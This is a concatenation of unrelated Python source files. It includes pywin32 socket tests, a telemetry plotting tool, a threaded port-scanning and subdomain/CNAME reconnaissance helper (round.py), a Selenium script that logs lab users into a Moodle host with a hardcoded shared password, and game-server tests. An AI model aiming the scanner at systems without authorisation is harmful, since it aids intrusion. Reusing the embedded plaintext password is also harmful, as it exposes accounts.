s2 = socket.socket()
s2.connect(self.addr)
length = 0
aaa = str2bytes("[AAA]")
bbb = str2bytes("[BBB]")
ccc = str2bytes("[CCC]")
ddd = str2bytes("[DDD]")
empty = str2bytes("")
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
ol = pywintypes.OVERLAPPED()
f.seek(0)
win32file.TransmitFile(
s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd
)
length += win32file.GetOverlappedResult(s2.fileno(), ol, 1)
s2.close()
th.join()
buf = str2bytes("").join(self.request)
self.assertEqual(length, len(buf))
expected = val + aaa + val + bbb + val + val + ccc + ddd + val
self.assertEqual(type(expected), type(buf))
self.assert_(expected == buf)
class TestWSAEnumNetworkEvents(unittest.TestCase):
def test_basics(self):
s = socket.socket()
e = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(s, e, 0)
self.assertEquals(win32file.WSAEnumNetworkEvents(s), {})
self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {})
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam")
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e)
self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam")
f = open("NUL")
h = win32file._get_osfhandle(f.fileno())
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h)
self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h)
try:
win32file.WSAEnumNetworkEvents(h)
except win32file.error as e:
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
try:
win32file.WSAEnumNetworkEvents(s, h)
except win32file.error as e:
# According to the docs it would seem reasonable that
# this would fail with WSAEINVAL, but it doesn't.
self.assertEquals(e.winerror, win32file.WSAENOTSOCK)
def test_functional(self):
# This is not really a unit test, but it does exercise the code
# quite well and can serve as an example of WSAEventSelect and
# WSAEnumNetworkEvents usage.
port = socket.socket()
port.setblocking(0)
port_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(
port, port_event, win32file.FD_ACCEPT | win32file.FD_CLOSE
)
port.bind(("127.0.0.1", 0))
port.listen(10)
client = socket.socket()
client.setblocking(0)
client_event = win32event.CreateEvent(None, 0, 0, None)
win32file.WSAEventSelect(
client,
client_event,
win32file.FD_CONNECT
| win32file.FD_READ
| win32file.FD_WRITE
| win32file.FD_CLOSE,
)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(
server,
server_event,
win32file.FD_READ | win32file.FD_WRITE | win32file.FD_CLOSE,
)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0, win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error as e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error as e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events:
break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
if __name__ == "__main__":
testmain()
|
tpm_feed.py
|
#!/usr/bin/env python3
import tpmdata
import multiprocessing
import pprint
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import dates
from astropy.time import Time
from argparse import ArgumentParser
from matplotlib import animation
import astropy.units as u
__version__ = '3.0.1'
tpmdata.tinit()
def get_tpm_packet(out_dict):
data = tpmdata.packet(1, 1)
for key, val in data.items():
out_dict[key] = val
return 0
class StripChart:
def __init__(self, key, fig, ax):
self.key = key
# self.fig = plt.figure(figsize=(6, 4))
# self.ax = self.fig.gca()
self.fig = fig
self.ax = ax
self.formatter = dates.DateFormatter('%H:%M')
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
self.t0 = Time.now()
self.times = Time([data['ctime']], format='unix')
self.values = np.array([data[self.key]])
self.line = plt.plot(self.times.plot_date, self.values)
self.ax.xaxis.set_major_formatter(self.formatter)
# self.fig.canvas.show()
# plt.draw()
def update(self, i):
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
self.times = Time(np.append(self.times, Time(data['ctime'],
format='unix')))
self.values = np.append(self.values, data[self.key])
sorter = np.argsort(self.times)
self.times = self.times[sorter]
self.values = self.values[sorter]
cutoff = self.times >= self.t0
self.times = self.times[cutoff]
self.values = self.values[cutoff]
if self.times.shape == (0,):
print('No times to plot')
return
self.ax.clear()
# print(self.times.to_datetime(), self.values)
self.ax.plot(self.times.to_datetime(), self.values, linewidth=3,
label=self.key)
self.ax.xaxis.set_major_formatter(self.formatter)
self.ax.axhline(self.values[0], c='r', linewidth=1,
label=f'Initial Value {self.key}')
self.ax.legend()
def parseargs():
parser = ArgumentParser(description='A tool to create strip charts using'
' the TPM')
parser.add_argument('-c', '--channels', nargs='+', default=['dewar_sp1_lb'],
help='Channel(s) to query and print')
parser.add_argument('-p', '--plot', action='store_true',
help='Channel(s) to plot')
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('--version', action='store_true')
parser.add_argument('--dt', nargs=1, type=float, default=5,
help='Time interval between prints (used with'
' --channels)')
parser.add_argument('--list-channels', dest='list_channels',
action='store_true',
help='Prints a list of all queriable channels')
args = parser.parse_args()
return args
def main(args=None):
if args is None:
args = parseargs()
if args.list_channels:
args.channels = []
if args.version:
print(__version__)
if args.list_channels:
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
pprint.pprint(data.keys())
if args.plot:
charts = []
anis = []
for channel in args.channels:
fig = plt.figure(figsize=(6, 4))
ax = fig.add_subplot(1, 1, 1)
chart = StripChart(channel, fig, ax)
print(args.dt * 1000)
anis.append(animation.FuncAnimation(fig, chart.update,
interval=args.dt * 1000))
charts.append(chart)
print('Close the plots to get a table feed')
plt.show()
if args.channels:
print()
print(f"{'Time':10}" + ''.join([' {:<12}'.format(channel)
for channel in args.channels]))
while True:
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
old_t = Time(data['ctime'], format='unix')
new_t = old_t
loop_cond = True
while loop_cond:
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
new_t = Time(data['ctime'], format='unix')
# print((new_t - old_t).to(u.s))
loop_cond = (new_t - old_t) < (args.dt * u.s)
print(f'{new_t.isot[11:19]:<10}' + ''.join([' {:12}'.format(
data[channel]) for channel in args.channels]))
if __name__ == '__main__':
main()
|
round.py
|
import random
import string
import socket
import threading
import dns.resolver as resolver
class ROUNDER:
PTHREADS = 0
PORTS = """21-23,25-26,53,81,110-111,113,135,139,143,179,199,445,465,514-515,548,554,587,646,993,995,1025-1027,
1433,1720,1723,2000-2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154"""
AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
FRESOL = "{:<18.15}"
FCODE = "{:<18.17}"
FSERVER = "{:<21.20}"
FSUBDOM = "{:<%i.%i}"
FPORTS = "{:<21.20}"
FSIMIL = "{:<10.9}"
FCNAME = "{:<}"
def rstring( self, strlen = 10 ):
letters = string.ascii_lowercase
return ''.join( random.choice(letters) for i in range( strlen ) )
def maxcountp( self, tocut, tosolve, toadd='', _count = 16 ):
for _ls in tosolve:
if len( _ls[: -len( toadd + tocut ) ] ) > _count:
_count = len( _ls[: -len( toadd + tocut ) ] )
return _count + 1
def fmreplsb( self, toput ):
self.FSUBDOM = self.FSUBDOM % ( toput, toput + 1 )
return
def seperator(self, code, headers):
_polls = {
'cd': 'ERR',
'sv': '',
}
if code:
_polls['cd'] = code
if headers:
headers = dict(headers)
if "Server" in list(headers.keys()):
_polls['sv'] = headers.get("Server")
return _polls
def iplocator(self, hostname, defip):
_ip = ''
try:
toput = socket.gethostbyname( hostname )
_ip = toput
except Exception as e:
pass
return _ip
def cnlocator(self, hostname, defcn):
_cn = ''
try:
aa = resolver.query( hostname, "CNAME" )
if aa:
return str( aa[ 0 ] )
return _cn
except:
return _cn
def ptlocator(self, hostname, pts, retlist=[]):
def connector(pt, sclass):
sclass.PTHREADS += 1
try:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.settimeout( 5 )
s.connect( (hostname, pt) )
retlist.append( str(pt) )
except:
pass
sclass.PTHREADS -= 1
for pt in pts:
_t = threading.Thread( target=connector, args=(pt, self) )
_t.daemon = True
_t.start()
while self.PTHREADS >= 6:
pass
while self.PTHREADS > 0:
pass
return list(set(retlist))
def formatrsv(self, ip, defip, cplate):
if ip == defip:
return cplate[ 'YELLOW' ] + self.FRESOL.format( ip ) + cplate[ 'END' ]
else:
return cplate[ 'RED' ] + cplate[ 'BOLD' ] + self.FRESOL.format( ip ) + cplate[ 'END' ]
def formatcdv(self, ca, cb, cplate):
def code( _code ):
if _code != "ERR":
_code = int( _code )
if _code >= 200 and _code < 300:
return cplate[ 'GREEN' ] + cplate[ 'BOLD' ] + "{:<3.3}".format( str( _code ) ) + cplate[ 'END' ]
elif _code >= 300 and _code < 400:
return cplate[ 'YELLOW' ] + cplate[ 'BOLD' ] + "{:<3.3}".format( str( _code ) ) + cplate[ 'END' ]
elif _code >= 400 and _code < 600:
return cplate[ 'RED' ] + cplate[ 'BOLD' ] + "{:<3.3}".format( str( _code ) ) + cplate[ 'END' ]
else:
return "{:<3.3}".format( str( _code ) )
return "{:<1.1}".format("[") + code( ca ) + "{:<1.1}".format("/") + code( cb ) + "{:<10.10}".format("]")
def formatsvv(self, sa, sb, cplate):
def server( _s1, _s2 ):
if _s1 != "NONE" and _s2 != "NONE":
return cplate[ 'BLUE' ] + cplate[ 'BOLD' ] + self.FSERVER.format( _s2 ) + cplate[ 'END' ]
elif _s1 == "NONE" and _s2 != "NONE":
return cplate[ 'BLUE' ] + cplate[ 'BOLD' ] + self.FSERVER.format( _s2 ) + cplate[ 'END' ]
elif _s1 != "NONE" and _s2 == "NONE":
return cplate[ 'BLUE' ] + cplate[ 'BOLD' ] + self.FSERVER.format( _s1 ) + cplate[ 'END' ]
else:
return self.FSERVER.format( _s1 )
return server( sa, sb )
def formatsbv( self, domain, subdomain ):
return self.FSUBDOM.format( subdomain.replace( "." + domain, "" ) )
def formatptv( self, _ports, cplate, stcount=20):
tlen = len( ",".join( [str(pt) for pt in _ports] ) )
if tlen > stcount:
ff = ",".join( [str(pt) for pt in _ports] )[ :stcount ]
else:
ff = ",".join( [str(pt) for pt in _ports] )
return cplate[ 'YELLOW' ] + self.FPORTS.format( ff ) + cplate[ 'END' ]
def formatcnv( self, _cname, cplate ):
return cplate[ 'BOLD' ] + cplate[ 'GREEN' ] + _cname + cplate[ 'END' ]
|
main.py
|
import os
import json
import random
import threading
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from webdriver_manager.chrome import ChromeDriverManager
def generate(users, courses):
"""
Generate a set of actions
Parameters
----------
None
Return
------
String, String
Two strings with a random username and a random course
"""
username = random.choice(users)
course = random.choice(courses)
return username,course
def login(uri, driver, username, password):
"""
Login function
Parameters
----------
uri : string
The host URI
driver : Selenium webdriver
A webdriver object to control browser with
username : string
A username string
password : string
The user's password
Return
------
None
"""
driver.implicitly_wait(3)
driver.get(uri)
driver.find_element(By.XPATH, '//*[@id="page-wrapper"]/nav/ul[2]/li[2]/div/span/a').click()
driver.find_element(By.ID, "username").send_keys(username)
driver.find_element(By.ID, "password").send_keys(password)
driver.find_element(By.ID, "loginbtn").click()
try:
driver.find_element(By.XPATH, '/html/body/span/div/div/div[4]/button[3]').click()
print("Tutorial modal found and dismissed")
except:
print("No tutorial modal")
def logout(uri, driver):
"""
Logout function
Parameters
----------
uri : string
The host URI
Return
------
None
"""
print("Logging out user")
driver.find_element(By.XPATH, "//a[contains(@aria-label, 'User menu')]").click()
driver.find_element(By.XPATH, "//a[contains(@href, 'logout.php')]").click()
def rng1(driver, course):
"""
Accesses a course passed in
Parameters
----------
driver : Selenium webdriver
A webdriver object to control browser with
course : string
A course string
Return
------
None
"""
print("RNG 1: Access course")
driver.find_element(By.XPATH, "//a[contains(@href, 'course/view.php?id=" + course + "')]").click()
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
def rng2(driver, uri):
"""
Accesses a random user's profile (ID between 2, 1000)
Parameters
----------
driver : Selenium webdriver
A webdriver object to control browser with
uri : string
The host URI
Return
------
None
"""
print("RNG 2: Access user")
userid = str(random.choice(range(2, 1000)))
driver.get(uri + "/user/view.php?id=" + userid)
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
def rng3(driver, uri, course):
"""
Accesses a random user's profile (ID between 2, 1000) also enrolled in course
Parameters
----------
driver : Selenium webdriver
A webdriver object to control browser with
uri : string
The host URI
course : string
A course string
Return
------
None
"""
print("RNG 3: Access user in course")
userid = str(random.choice(range(2, 1000)))
driver.get(uri + "/user/view.php?id=" + userid + "&course=" + course)
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
def rng4(driver, uri, path):
"""
Accesses a random user's profile (ID between 2, 1000) and submits Essay.odt on their behalf
Parameters
----------
driver : Selenium webdriver
A webdriver object to control browser with
uri : string
The host URI
Return
------
None
"""
print("Getting course 9")
driver.find_element(By.XPATH, "//a[contains(@href, 'course/view.php?id=9')]").click()
print("On course ID 9")
driver.implicitly_wait(2)
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
driver.implicitly_wait(2)
print("Selecting assignment")
driver.find_element(By.XPATH, "//a[contains(@href, 'assign/view.php?id=140')]").click()
driver.implicitly_wait(2)
try:
print("Trying to remove old submission")
driver.find_element(By.XPATH, "//button[contains(text(), 'Remove submission')]").click()
driver.implicitly_wait(0.5)
driver.find_element(By.XPATH, "//button[contains(text(), 'Continue')]").click()
driver.implicitly_wait(0.5)
driver.find_element(By.XPATH, "//button[contains(text(), 'Edit submission')]").click()
except:
print("Unable to remove old submission (maybe it doesn't exist). Adding instead.")
print("Selecting Add submission button")
driver.find_element(By.XPATH, "//button[contains(text(), 'Add submission')]").click()
driver.implicitly_wait(0.5)
# True is online text, false is upload
if path == True:
print("Uploading in web editor")
essay = ""
with open('./essay.txt', 'r') as f:
essay = f.read()
print("Essay preview: " + essay[0:50])
driver.find_element(By.ID, "id_onlinetext_editoreditable").click()
actions = ActionChains(driver)
actions.send_keys(essay)
actions.perform()
#driver.find_element(By.ID, "id_onlinetext_editor").send_keys(essay)
#driver.find_element(By.ID, "id_onlinetext_editor").send_keys(essay)
else:
print("Uploading as document")
essay = "./Essay.odt"
driver.find_element(By.XPATH, "//a[contains(@title, 'Add...')]").click()
driver.implicitly_wait(1)
driver.find_element(By.XPATH, "//span[contains(text(), 'Upload a file')]").click()
driver.implicitly_wait(1)
print("Sending essay string")
driver.find_element(By.XPATH, "//input[@type='file']").send_keys(os.getcwd() + "/" + essay)
print("Essay string sent")
print("Uploading file")
driver.find_element(By.XPATH, "//button[contains(text(), 'Upload this file')]").click()
driver.implicitly_wait(2)
print("Submitting essay")
driver.find_element(By.XPATH, "//input[contains(@name, 'submitbutton')]").click()
print("Essay submitted")
def simaction(rngaction, rng4action, threads, driver, service, options, uri, users, courses, password):
try:
driver.set_window_size(1366, 1060)
print("Generating random username and course")
username, course = generate(users, courses)
login(uri, driver, username, password)
driver.implicitly_wait(5)
print("RNG action " + str(rngaction))
if (rngaction == 1):
rng1(driver, course)
elif (rngaction == 2):
rng2(driver, uri)
elif (rngaction == 3):
rng3(driver, uri, course)
elif (rngaction == 4):
path = rng4action
rng4(driver, uri, rng4action)
else:
rng1(driver, course)
logout(uri, driver)
print("Destroying driver")
driver.quit()
print("Driver destroyed")
except:
print("No driver to destroy")
def main():
print("Initializing options")
options = Options()
print("Adding options: headless")
options.add_argument('--headless')
print("Creating service")
service = Service(ChromeDriverManager().install())
uri = "http://192.168.122.61"
print("Set URI to" + uri)
print("Creating users list from usernames.json")
users = json.loads(open("usernames.json").read())
print("Creating courses list from courses.json")
courses = json.loads(open("courses.json").read())
print("Setting global user password")
password = "Kenyon5%"
while True:
print("Initializing threads")
numthreads = 10
threads = []
print("Initializing path choice")
action = random.choice([1,1,1,1,2,2,3,4,4,4,4])
rng4action = random.choice([True, False])
print("Initializing " + str(numthreads) + " drivers indexed at 0")
drivers = []
for i in range(numthreads):
print("Initializing driver " + str(i))
drivers.append(webdriver.Chrome(service = service, options = options))
print("Initialized driver " + str(i))
print("Initialized thread environment")
for i in range(numthreads):
t = threading.Thread(target = simaction, args = (action, rng4action, numthreads, drivers[i], service, options, uri, users, courses, password))
print("Initialized thread")
t.daemon = True
threads.append(t)
for i in range(numthreads):
print("Starting threads")
threads[i].start()
for i in range(numthreads):
print("Joining threads")
threads[i].join()
if __name__ == "__main__":
main()
|
test_server.py
|
# Test Server / Client Communication
import pytest, time, threading, socket
import socketio
from socketio.client import Client
from socketio.server import Server
import server, client
from server import Client as cs_client
##### Variables and global Server object #####
HOST = '127.0.0.1'
PORT = 5000
# Server object is instantiated outside of test scope as there is no shutdown feature
SERVER = server.CommunicationServer(8)
SERVER.CreateServer(HOST,PORT)
##### FIXTURES #####
# Client Instances Fixture
# Argument: Number of Clients to create
# Return: List of instantiated Client objects
@pytest.fixture
def ClientInstances(NoClients):
Instances = []
for element in range(NoClients):
Instances.append(client.Player())
return Instances
def delayedSendinformation(client, msg, delay):
print('Executing delayed message in: ', str(delay), ' seconds')
time.sleep(delay)
client.SendInformationToOpponent(msg)
print('Message sent, exiting thread...')
def clean_server():
SERVER.Clients = []
SERVER.ActiveGames = []
SERVER.TournamentGames = []
SERVER.ConcludedGames = []
SERVER.TournamentStarted = False
##### TESTS #####
def test_AI():
clean_server()
SERVER.AddAI()
SERVER.AddAI()
assert SERVER.GetNumPlayers() == 2
for i in range(2):
SERVER.Clients.append(cs_client(str(i)))
SERVER.generateTournament()
assert len(SERVER.TournamentGames) == 6
SERVER.generateRound()
#Check that AI games are skipped
assert len(SERVER.ActiveGames) == 1
assert len(SERVER.ConcludedGames) == 1
assert SERVER.Clients[0].get_id() != SERVER.Clients[1].get_id()
#Check that AIs are AI
assert SERVER.Clients[0].isAI
assert SERVER.Clients[1].isAI
#Check that players are not AI
assert not SERVER.Clients[2].isAI
assert not SERVER.Clients[3].isAI
#Server unit tests - no events
def test_server_unit():
clean_server()
#Fill Clients with dummies
for i in range(8):
SERVER.Clients.append(cs_client(str(i)))
assert SERVER.GetNumPlayers() == 8
#Try generating a tournament
SERVER.generateTournament()
assert len(SERVER.TournamentGames) == 28
#Try generating a round
SERVER.generateRound()
assert len(SERVER.TournamentGames) == 24
assert len(SERVER.ActiveGames) == 4
#Test generate new games while tournament is going
assert SERVER.generateRound() == -1
assert SERVER.generateTournament() == -1
#Check all players are in a game
for i in range(8):
assert SERVER.FindActiveGameBySid(str(i)) != None
game = SERVER.FindActiveGameBySid('1')
opponent = 0
if(game.PlayerA.get_id() == '1'):
opponent = game.PlayerB
else:
opponent = game.PlayerA
#Test removing game
SERVER.ActiveGames.remove(game)
assert SERVER.FindActiveGameBySid('1') == None
assert SERVER.FindActiveGameBySid(opponent.get_id()) == None
for i in range(6):
SERVER.ActiveGames = []
assert SERVER.generateRound() == 0
assert len(SERVER.ActiveGames) == 4
assert len(SERVER.TournamentGames) == 0
@pytest.mark.parametrize('NoClients', [8])
def test_Tournament_logic(ClientInstances, NoClients):
clean_server()
#Connect all clients
for client in ClientInstances:
assert client.ConnectToServer(HOST, PORT) == 0
client0 = ClientInstances[0]
client0_playerinfo = SERVER.Clients[0].PlayerInfo
assert client0_playerinfo.GamesLeft == 0
assert client0_playerinfo.GamesPlayed == 0
assert client0_playerinfo.NumberOfWins == 0
#Ready up all players
for client in ClientInstances:
assert client.Ready() == 0
assert client0_playerinfo.GamesLeft == 7
#Make sure tournament started
assert len(SERVER.TournamentGames) == 24
assert len(SERVER.ActiveGames) == 4
client0.SignalVictory()
#Check PlayerInfo Updates
assert client0_playerinfo.GamesLeft == 6
assert client0_playerinfo.GamesPlayed == 1
assert client0_playerinfo.NumberOfWins == 1
#Check that game concluded and moved to ConcludedGames
assert len(SERVER.ActiveGames) == 3
assert len(SERVER.ConcludedGames) == 1
client0_game = SERVER.ConcludedGames[0]
#Get client0 opponent
opponent = None
if client0_game.PlayerA == SERVER.Clients[0]:
opponent = client0_game.PlayerB
else:
opponent = client0_game.PlayerA
opponent_index = SERVER.Clients.index(opponent)
assert ClientInstances[opponent_index].SignalVictory() == -1
#Set client0_game as last game
SERVER.ActiveGames = []
SERVER.ActiveGames.append(client0_game)
client0_game.Active = True
#Check if client_0 wins on disconnect
assert ClientInstances[opponent_index].Disconnect() == 0
time.sleep(0.5)
assert client0_playerinfo.GamesLeft == 5
assert client0_playerinfo.GamesPlayed == 2
assert client0_playerinfo.NumberOfWins == 2
#Check that players can retrieve their player info
playerinfo = client0.GetPlayerInfo()
assert playerinfo is not None
assert playerinfo['GamesLeft'] == 5
assert playerinfo['GamesPlayed'] == 2
assert playerinfo['NumberOfWins'] == 2
#Check if new round started when last game concluded
assert len(SERVER.TournamentGames) == 15 # requirements from Group D
assert len(SERVER.ActiveGames) == 3
for client in ClientInstances:
client.Disconnect()
# Test Client Matching and Sending Data
@pytest.mark.parametrize('NoClients', [8])
def test_ClientMessaging(ClientInstances, NoClients):
clean_server()
Client_1 = ClientInstances[0]
Client_2 = ClientInstances[1]
GameState = {'Data':'Message','Error':None}
# Connect Clients to server
assert Client_1.ConnectToServer(HOST,PORT) == 0
assert Client_2.ConnectToServer(HOST,PORT) == 0
# Both Clients Ready up (Should start a match between them)
Client_1.Ready()
Client_2.Ready()
time.sleep(2)
# Assert that neither client has recieved any messages
assert len(Client_1.MessageQue) == 0
assert len(Client_2.MessageQue) == 0
# Create a thread that sends a message from client 1 to client 2 after 2 seconds
message = {'Action':'Left','Error':None}
thread = threading.Thread(target=delayedSendinformation, args=[Client_1,message,2])
thread.start()
# Fetch Data and assert that timeout did not occur
timeout = time.time() + 30
data_2 = Client_2.GetMessageFromOpponent(blocking = True, timeout = 60)
assert time.time() < timeout
data_1 = Client_1.GetMessageFromOpponent(blocking = False)
# Both Clients should have cleared their message ques after getting messages
assert len(Client_1.MessageQue) == 0
assert len(Client_2.MessageQue) == 0
print('Data 1')
print(data_1)
print('Data 2')
print(data_2)
# Assert that client 2 has recieved data, and that message was correct
assert len(data_1) == 0
assert len(data_2) == 1
assert data_2[0]['data']['Action'] == 'Left'
assert data_2[0]['data']['Error'] == None
# Get messages again, should recieve nothing
data_1 = Client_1.GetMessageFromOpponent(blocking = False)
data_2 = Client_2.GetMessageFromOpponent(blocking = False)
assert len(data_1) == 0
assert len(data_2) == 0
# Test sending more messages
msg_1 = {'msg_1':'packet_1'}
msg_2 = {'msg_2':-1}
msg_3 = {'msg_3':0.5}
Client_2.SendInformationToOpponent(msg_1)
Client_2.SendInformationToOpponent(msg_2)
Client_2.SendInformationToOpponent(msg_3)
Client_1.SendInformationToOpponent(msg_1)
Client_1.SendInformationToOpponent(msg_2)
time.sleep(1)
timeout = time.time() + 30
data_1 = Client_1.GetMessageFromOpponent(blocking = True, timeout = 60)
assert time.time() < timeout
data_2 = Client_2.GetMessageFromOpponent(blocking = False)
print('Data in Client 1: ')
print(data_1)
print('Data in Client 2: ')
print(data_2)
assert len(data_1) == 3
assert len(data_2) == 2
assert len(Client_1.MessageQue) == 0
assert len(Client_2.MessageQue) == 0
assert data_1[0]['data']['msg_1'] == 'packet_1'
assert data_1[1]['data']['msg_2'] == -1
assert data_1[2]['data']['msg_3'] == 0.5
assert data_2[0]['data']['msg_1'] == 'packet_1'
assert data_2[1]['data']['msg_2'] == -1
# Test many messages in quick succession
for i in range(20):
Client_2.SendInformationToOpponent({'packet':i})
time.sleep(1)
timeout = time.time() + 30
data_1 = Client_1.GetMessageFromOpponent(blocking = True, timeout = 60)
assert time.time() < timeout
for i in range(20):
assert data_1[i]['data']['packet'] == i
for client in ClientInstances:
client.Disconnect()
# Test Client Connections and Server Capacity
@pytest.mark.parametrize('NoClients', [16])
def test_ClientConnect(ClientInstances, NoClients):
clean_server()
# List of indices in ClientInstances list
Set = [0,1,2,3,4,5,6,7]
for i in Set:
# Assert that client connection attempt returns 0
assert ClientInstances[i].ConnectToServer(HOST,PORT) == 0
time.sleep(0.1)
# Check that server has 8 clients connected
assert len(SERVER.Clients) == 8
Set = [8,9,10,11]
for i in Set:
# Assert that client connection attempt returns -1
assert ClientInstances[i].ConnectToServer(HOST,PORT) == -1
time.sleep(0.1)
# Check that server did not connect any more clients
assert len(SERVER.Clients) == 8
Set = [0,1,2,3]
for i in Set:
ClientInstances[i].Disconnect()
time.sleep(0.1)
# Check that server registered 4 client disconnects
assert len(SERVER.Clients) == 4
Set = [8,9,10,11]
for i in Set:
assert ClientInstances[i].ConnectToServer(HOST,PORT) == 0
time.sleep(0.1)
assert len(SERVER.Clients) == 8
# Assert client connection failed & capacity = 8
assert ClientInstances[12].ConnectToServer(HOST,PORT) == -1
assert SERVER.MaxConcurrentClients == 8
# Increment server capacity by 2
SERVER.MaxConcurrentClients += 2
time.sleep(0.1)
# Check that capacity was incremented
assert SERVER.MaxConcurrentClients == 10
# Assert that two more clients can connect, but fail on third
assert ClientInstances[12].ConnectToServer(HOST,PORT) == 0
assert ClientInstances[13].ConnectToServer(HOST,PORT) == 0
assert ClientInstances[14].ConnectToServer(HOST,PORT) == -1
time.sleep(0.1)
